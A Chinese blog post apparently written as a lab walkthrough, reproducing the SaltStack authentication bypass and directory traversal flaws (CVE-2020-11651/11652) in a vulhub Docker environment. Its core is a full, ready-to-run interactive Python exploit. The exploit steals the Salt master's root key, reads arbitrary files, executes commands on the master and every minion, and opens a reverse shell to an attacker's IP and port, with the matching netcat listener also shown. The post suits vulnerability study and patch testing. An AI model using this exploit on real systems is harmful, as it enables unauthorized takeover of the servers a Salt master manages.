SaltStack 水平权限绕过漏洞(CVE-2020-11651+11652)

最新推荐文章于 2022-12-15 13:33:35 发布
最新推荐文章于 2022-12-15 13:33:35 发布
阅读量376 收藏
点赞数
分类专栏: 中间件漏洞复现 文章标签: 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/110718031
版权

声明

好好学习,天天向上

漏洞描述

SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。

在 CVE-2020-11651 认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞。

影响范围

  • SaltStack < 2019.2.4
  • SaltStack < 3000.2

复现过程

使用vulhub

这里使用2019.2.3版本

/app/vulhub-master/saltstack/CVE-2020-11651

启动

docker-compose up -d

环境启动后,将会在本地监听如下端口:

  • 4505/4506 这是SaltStack Master与minions通信的端口
  • 8000 这是Salt的API端口
  • 2222 这是容器内部的SSH服务器监听的端口

下载POC

https://github.com/dozernz/cve-2020-11651

我这用另一位大佬的POC,创建cve-2020-11651.py,内容如下,内容不需要修改,直接运行即可

# BASE https://github.com/bravery9/SaltStack-Exp
# 微信公众号:台下言书
# -*- coding:utf-8 -*- -
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import os
import sys
import datetime

import salt
import salt.version
import salt.transport.client
import salt.exceptions

DEBUG = False


def init_minion(master_ip, master_port):
    minion_config = {
        'transport': 'zeromq',
        'pki_dir': '/tmp',
        'id': 'root',
        'log_level': 'debug',
        'master_ip': master_ip,
        'master_port': master_port,
        'auth_timeout': 5,
        'auth_tries': 1,
        'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)
    }

    return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')


def check_salt_version():
    print("[+] Salt 版本: {}".format(salt.version.__version__))

    vi = salt.version.__version_info__

    if (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)):
        return True
    else:
        return False


def check_connection(master_ip, master_port, channel):
    print("[+] Checking salt-master ({}:{}) status... ".format(master_ip, master_port), end='')
    sys.stdout.flush()
    try:
        channel.send({'cmd': 'ping'}, timeout=2)
        print('\033[1;32m可以连接\033[0m')
    except salt.exceptions.SaltReqTimeoutError:
        print("\033[1;31m无法连接\033[0m")
        sys.exit(1)


def check_CVE_2020_11651(channel):
    sys.stdout.flush()
    # try to evil
    try:
        rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)
    except salt.exceptions.SaltReqTimeoutError:
        print("\033[1;32m不存在漏洞\033[0m")
    except:
        print("\033[1;32m未知错误\033[0m")
        raise
    else:
        pass
    finally:
        if rets:
            root_key = rets[2]['root']
            print("\033[1;31m存在漏洞\033[0m")
            return root_key

    return None


def pwn_read_file(channel, root_key, path, master_ip):
    # print("[+] Attemping to read {} from {}".format(path, master_ip))
    sys.stdout.flush()

    msg = {
        'key': root_key,
        'cmd': 'wheel',
        'fun': 'file_roots.read',
        'path': path,
        'saltenv': 'base',
    }

    rets = channel.send(msg, timeout=3)
    print(rets['data']['return'][0][path])



def pwn_getshell(channel, root_key, LHOST, LPORT):
    msg = {"key": root_key,
           "cmd": "runner",
           'fun': 'salt.cmd',
           "kwarg": {
               "fun": "cmd.exec_code",
               "lang": "python3",
               "code": "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{}\",{}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);".format(
                   LHOST, LPORT)
           },
           'jid': '20200504042611133934',
           'user': 'sudo_user',
           '_stamp': '2020-05-04T04:26:13.609688'}

    try:
        response = channel.send(msg, timeout=3)
        print("Got response for attempting master shell: " + str(response) + ". Looks promising!")
        return True
    except:
        print("something failed")
        return False


def pwn_exec(channel, root_key, exec_cmd, master_or_minions):
    if master_or_minions == "master":
        msg = {"key": root_key,
               "cmd": "runner",
               'fun': 'salt.cmd',
               "kwarg": {
                   "fun": "cmd.exec_code",
                   "lang": "python3",
                   "code": "import subprocess;subprocess.call('{}',shell=True)".format(exec_cmd)
               },
               'jid': '20200504042611133934',
               'user': 'sudo_user',
               '_stamp': '2020-05-04T04:26:13.609688'}

        try:
            response = channel.send(msg, timeout=3)
            print("Got response for attempting master shell: " + str(response) + ". Looks promising!")
            return True
        except:
            print("something failed")
            return False

    if master_or_minions == "minions":
        print("Sending command to all minions on master")
        jid = "{0:%Y%m%d%H%M%S%f}".format(datetime.datetime.utcnow())
        cmd = "/bin/sh -c '{0}'".format(exec_cmd)

        msg = {'cmd': "_send_pub", "fun": "cmd.run", "arg": [cmd], "tgt": "*", "ret": "", "tgt_type": "glob",
               "user": "root", "jid": jid}

        try:
            response = channel.send(msg, timeout=3)
            if response == None:
                return True
            else:
                return False
        except:
            return False


#####################################

master_ip=input('目标IP:')
master_port='4506'
channel = init_minion(master_ip, master_port)
try:
    root_key = check_CVE_2020_11651(channel)
except:
    pass
while master_ip!='':
    print('1.测试POC  2.读取文件  3.执行命令(无回显)  4.反弹shell  5.退出')

    whattype=input('请选择:')
    if whattype=='1':
        check_salt_version()  # 检查salt版本
        check_connection(master_ip, master_port, channel)  # 检查连接
        root_key = check_CVE_2020_11651(channel)  # 读取root key
        print(root_key)
    elif whattype=='2':
        path = input('读取路径:')
        try:
            pwn_read_file(channel, root_key, path, master_ip)  # 读取文件
        except:
            print('文件不存在')
    elif whattype=='3':
        print('1.master   2.minions')
        exectype = input('选择方式:')
        if exectype=='1':
            master_or_minions='master'
        elif exectype=='2':
            master_or_minions = 'minions'
        exec_cmd = input('输入命令:')
        pwn_exec(channel, root_key, exec_cmd, master_or_minions)  # 执行命令
    elif whattype=='4':
        LHOST = input('反弹到IP:')
        LPORT = input('反弹端口:')
        pwn_getshell(channel, root_key, LHOST, LPORT)  # 反弹shell
    elif whattype=='5':
        exit()

当然,运行POC的前提,是得安装依赖包(我这破网,搞了好久)

pip3 install salt

安装后,可以直接运行

python3 cve-2020-11651.py

运行后提示让你输入IP,直接输入IP就好

然后就是个while的循环菜单,用户体验极好

测试是否存在漏洞,就根据提示选1

读取文件,就选2,然后输入文件路径

反弹shell,就选3,记录,kali中先监听,比如我想让他往我的kali,192.168.239.139上的8888反弹

kali监听8888

nc -lvvp 8888

POC中选4,输入kali的IP和端口

在这里插入图片描述

在这里插入图片描述

使用完关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SaltStack 水平权限绕过漏洞CVE-2020-11651
锋刃科技的博客
06-23 1237
前言 SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞CVE-2020-11651)和目录遍历漏洞CVE-2020-11652)。 在 CVE-2020-11651 认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞漏洞分析 漏洞由ClearFuncs类引起,该类无意中暴露了_send_pub()和_prep_auth_
安全测试-- WEB 实战
Qton_CSDN的博客
02-27 3268
  增:XSS、文件上传get shell 删:越权 查:sql注入、越权 改:XSS、越权 好  也可以用wvs先扫 根据报告找漏洞的点            一  端口信息收集 kali : nmap -A -T4 192.168.1.35 端口信息收集  端口信息收集资料 问题:端口扫描是指某些别有用心的人发送一组端口扫描消息,试图以此侵入某台计算机,并了解其提供的...
saltstack minion连接master响应超时的问题
HanJiezZ的博客
12-28 2044
salt-minion 发起认证请求或认证后和master进行通讯时,master端信息收发正常,但是minion端却一直收不到,minion的日志提示这个类别的报错: SaltReqTimeoutError salt请求超时。 今天突发其想,尝试修改MTU,好家伙,这家的MTU是1052,也是奇葩。改了MTU后,神奇了,通讯恢复正常了。应用层是没问题的,出在了网络层。大家都可以尝试下。 ...
Apache Shiro权限绕过漏洞CVE-2022-32532)
weixin_54438700的博客
12-15 2763
Shiro是Apache旗下一个开源的Java安全框架,它具有身份验证、访问控制、数据加密、会话管理等功能,可以用于保护任何应用程序的安全,如移动应用程序、web应用程序等。2022年6月29日,Apache官方披露Apache Shiro权限绕过漏洞CVE-2022-32532),当 Apache Shiro 中使用 RegexRequestMatcher 进行权限配置,且正则表达式中携带“.”时,未经授权的远程攻击者可通过构造恶意数据包绕过身份认证。
漏洞情报 | Windows Install(WMI)越权漏洞CVE-2020-0683)POC在野利用
爱国小白帽
02-02 1093
0x01 漏洞描述 Microsoft Windows是美国微软(Microsoft)公司的个人使用的操作系统(PC)。 2020年初,Windows公布发布的漏洞通告,Windows Install存在越权漏洞CVE-2020-0683),攻击者可以利用该漏洞进行越权修改或者删除系统重要的文件数据。近日,360漏洞云监测到该漏洞的POC已经公开并已出现漏洞在野利用,请相关单位及时更新系统补丁。 0x02 漏洞影响范围 Windows 7 Windows 8.1 Windows RT 8.1 Wind.
SaltStack 任意文件读写漏洞CVE-2020-11652
锋刃科技的博客
06-23 2163
前言 SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞CVE-2020-11651)和目录遍历漏洞CVE-2020-11652)。 在 CVE-2020-11652 目录遍历漏洞中,攻击者通过构造恶意请求,可以读取、写入服务器上任意文件。 影响版本: SaltStack Version < 2019.2.4 SaltStack Version < 3000.2 漏洞分析 漏洞由Salt Mast
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC
09-04
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, ...
CVE-2020-11651:CVE-2020-11651
04-15
CVE-2020-11651 在2019.2.4之前的SaltSalt Salt中发现了一个问题,在3000.2。之前的3000中发现了一个问题。 盐主进程ClearFuncs类无法正确验证方法调用。 这使远程用户无需身份验证即可访问某些方法。 这些方法可...
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)
07-17
直接使用java -jar srping....war命令运行即可 执行之后,访问http://主机的IP:8888/admin/*或者http://主机的IP:8888/login
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
IP问题导致salt-stack系统异常
04-13 3730
1. salt-master的IP不通      比如salt-master节点网线掉了,或者当前masterIP漂移过,网卡的mac地址变了,但是salt-minion节点自身的arp表没有更新。      salt- minion日志特征: 2016-04-12 20:37:48,740 [salt.crypt                               ][WA
salt 执行命令等待_salt的api学习记录--salt命令的执行过程
weixin_39771969的博客
12-18 541
现在终于开始学习salt的api了,有些小激动啊,我们执行命令的时候,后台到底是如何处理的,发生什么了事情,我对着一切有着强烈的好奇心啊。这些是saltstack命令对应的api:salt--->salt.client.LocalClientsalt-minion--->salt.minion.Minionsalt-cp--->salt.cli.cp...
vulhub漏洞复现-saltstack(CVE-2020-11651CVE-2020-11652)越权命令执行/遍历目录
遇事不决冲冲冲
10-10 4668
SaltStack 基于Python开发的一套C/S架构配置管理工具,通过部署SaltStack,可以在成千万台服务器上做到批量执行命令,根据不同业务进行配置集中化管理、分发文件、采集服务器数据、操作系统基础及软件包管理等,简单来说就是可以集中管理各种各样的服务器,但在 SaltStack < 2019.2.4,SaltStack < 3000.2版本中出现了认证绕过漏洞,通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关未授权函数功能,从而可以造成远程任意命令执行
Python Saltstack框架CVE-2020-11651CVE-2020-11652漏洞以及POC详解
村中少年的专栏
05-10 1568
Python saltstack框架CVE-2020-11651CVE-2020-11652漏洞以及POC详解
Centos7上Saltstack 安装配置详解
菲宇运维
09-13 5977
一、saltstack简介 Saltstack 比 Puppet 出来晚几年,是基于Python 开发的,也是基于 C/S 架构,服务端 master 和客户端 minions ;Saltstack 和 Puppet 很像,可以说 Saltstatck 整合了 Puppet 和 Chef 的功能,更加强大,更适合大规模批量管理服务器,并且它比 Puppet 更容易配置。 三大功能: 远程命...
SaltStack连接Linux&Windows机器
wn_hello的小宇宙
07-28 3801
搭建Saltstack环境,在过程中发现,跟ansible有很大的区别,功能分成了module和state,变得复杂了。首先需要在安装master、minion端,在通信方式上因为采用的Zeromq,需要获取机器的fqdn,这边虚拟机由于网卡问题容易踩坑,再之后还有hostname,端口访问等问题,总的来说,比ansible严格很多,毕竟ansible只要ssh OK就行了。下面记录遇到的error
权限漏洞水平权限漏洞、垂直权限漏洞
aabbyyz的博客
11-02 1508
分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 水平权限漏洞是指Web
saltstack "ImportError: No module named salt.scripts"错误解决
weixin_34111819的博客
09-19 416
一、问题描述 生产线上使用的自动化管理工具是saltstack,CentOS6.8 x64,python 2.6.6 ,正所谓不作不死,由于有些功能需要python2.7.x ,在升级好python2.7后,写了saltstack api 发现python2.7不好使,原理是python2.7下没有salt模块,因此pip install salt即在pytho...
nacos权限绕过漏洞(CVE-2021-29441)
最新发布
10-26
nacos权限绕过漏洞(CVE-2021-29441)是指在nacos进行认证授权操作时,会判断请求的user-agent是否为"Nacos-Server",如果是的话则不进行任何认证。攻击者可以通过伪造请求头中的user-agent来绕过认证,获取到用户名...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值